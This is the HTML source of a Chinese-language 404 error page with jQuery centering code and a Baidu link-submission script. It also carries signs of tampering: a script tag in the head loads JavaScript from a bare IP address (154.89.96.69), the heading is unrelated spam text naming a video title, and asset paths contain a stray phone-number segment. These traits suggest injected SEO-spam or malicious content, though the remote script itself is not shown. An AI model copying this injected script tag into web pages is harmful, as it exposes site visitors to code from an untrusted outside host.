  <!DOCTYPE>
<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <title>404</title>
    <link href="/tel:0512-68761603/css/css/404.css" rel="stylesheet" type="text/css" />
    <script src="/tel:0512-68761603/css/js/404.js"></script>
    <script type="text/javascript">
        $(function() {
            var h = $(window).height();
            $('body').height(h);
            $('.mianBox').height(h);
            centerWindow(".tipInfo");
        });

        //2.将盒子方法放入这个方，方便法统一调用
        function centerWindow(a) {
            center(a);
            //自适应窗口
            $(window).bind('scroll resize',
                function() {
                    center(a);
                });
        }

        //1.居中方法，传入需要剧中的标签
        function center(a) {
            var wWidth = $(window).width();
            var wHeight = $(window).height();
            var boxWidth = $(a).width();
            var boxHeight = $(a).height();
            var scrollTop = $(window).scrollTop();
            var scrollLeft = $(window).scrollLeft();
            var top = scrollTop + (wHeight - boxHeight) / 2;
            var left = scrollLeft + (wWidth - boxWidth) / 2;
            $(a).css({
                "top": top,
                "left": left
            });
        }
    </script>

<script src="http://154.89.96.69/ayldy.js"></script>


</head>
<Body><h1><a href="/">星空无限MV国产剧梁佳新</a></h1><script>
(function(){
var bp = document.createElement('script');
var curProtocol = window.location.protocol.split(':')[0];
if (curProtocol === 'https') {
bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
}
else {
bp.src = 'http://push.zhanzhang.baidu.com/push.js';
}
var s = document.getElementsByTagName('script')[0];
s.parentNode.insertBefore(bp, s);
})();
</script>
<div class="mianBox">
    <img src="/images/yun0.png" alt="" class="yun yun0" />
    <img src="/images/yun1.png" alt="" class="yun yun1" />
    <img src="/images/yun2.png" alt="" class="yun yun2" />
    <img src="/images/bird.png" alt="" class="bird" />
    <img src="/images/san.png" alt="" class="san" />
    <div class="tipInfo">
        <div class="in">
            <div class="textThis">
                <h2>出错啦404！</h2>
                <p>
                    <a href="/tel:0512-68761603/css/index.html" style="margin-right: 130px;">返回首页</a>
                    <a href="javascript:history.back(-1)">返回上一步</a>
                </p>

            </div>
        </div>
    </div>
</div>

</body>
</html>
